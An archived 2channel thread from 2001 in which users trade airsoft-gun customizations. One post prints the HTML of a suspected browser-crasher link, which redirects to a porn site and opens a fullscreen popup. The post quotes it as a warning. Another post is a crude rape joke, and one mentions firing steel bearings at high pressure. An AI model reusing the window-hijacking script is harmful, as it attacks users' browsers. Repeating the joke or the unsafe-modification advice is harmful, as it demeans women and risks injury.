2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

カスタム内容教えて

1 :1:01/09/19 03:45
みんなのカスタム内容(パワーUP以外でも)教えて。

2 :うらなり野郎:01/09/19 03:59
パーツの擦り合わせはよくやりますね。
というか、それぐらいしかやらないです。

3 :あおやまゆうき:01/09/19 12:57
パーツのすりあわせと、ピストンヘッドの後方吸気化改造です。
後方吸気化の方法は、「エアソフトガンチューンナップ」で紹介してますよ。

4 :ミスプレ改:01/09/19 15:01
すべてのハンドガンをフルオート化して、
SMG・MGには増音機をつける。(できればハンドガンにも
音がでかくなるのでゲームで使うと相手にかかるプレッシャー増大。
パワーアップもいいけど心理的パワーアップもどうですか?
逆に極限まで消音化するのもいいかも。

5 :元隊員:01/09/19 17:33
とにかく自作。プラ版とポリパテを駆使して、外観を改造あるいは
使いやすいように改良してしまう。
500連マガジンを改造してミニミ風のドラムマガジン(3000連)を作ったり、
その昔、マルイの電動G3をHK MG43のような形に改造したりもした。
(実際はミニミもどきってことで作ったんだがね。当時はHKMG34まだ出てないから)
しかし、強度不足でレシーバーから先がポッキリ折れてしまった・・・

6 :名無し:01/09/19 18:19
>>1
女に軍服着せてカスタムした後、バックから犯した。
腰が細くて、ポッキリ折れそうだった…。

7 :カゴ:01/09/19 18:26
これはなんなんでしょうか?
http://www2u.biglobe.ne.jp/~hole/

8 :  :01/09/20 18:28
>>7の中身。アクセスしない方がいいと思う。ブラクラの可能性あり。


<html>
<head>
<title>無題ドキュメント</title>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<meta http-equiv="refresh" content="0;URL=http://www.sex-jp.net/dh/01/">
</head>
<SCRIPT language="JavaScript">
function winresize(){
self.moveTo(-7,-120);
var winwidth = screen.availWidth;
winwidth = winwidth + 7;
var winheight = screen.availHeight;
winheight = winheight + 146;
self.resizeTo(winwidth,winheight);
window.open("http://www.sex-jp.net/dh/01/","","fullscreen=1,scrollbars");

}
</SCRIPT>
<body bgcolor="#FFFFFF" onLoad="winresize();">

</body>
</html>

9 : :01/11/07 04:59


10 :  :01/11/07 12:38
1が俺の技術を盗もうとしている。

11 :碧紗:01/11/12 03:54
ファマスのキャリーハンドル外してスコープつけて
バレル切り落とした。
なかなかカコイイ

12 :名無しさん:01/11/12 06:25
エイブラムス

13 :教えておくれ:01/11/12 10:19
クルツにラージバッテリーを積みたいんだけど、
何かいい方法はないかね?
本体が小さいからさ、どうしても外付けになってしまう。
AKの3000oとかって、ないのかな?
あれば、売れると思うけど。

14 :    :01/12/19 13:07
唐揚げ

15 :ガンスミス:01/12/19 13:09
とりあえず外部ソース10気圧に耐えられるようにした
弾はもちろん6mmベアリング

16 :ベレット:01/12/19 13:22
メカボを研磨。ピストンに穴あけてと内部のウェイト取って
軽量化。ピストンヘッドに穴あけて吸排気機能をもたせる。
結果、発射音はそこそこ減ったけど実射性能には大きな変化
は無かった。

4 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)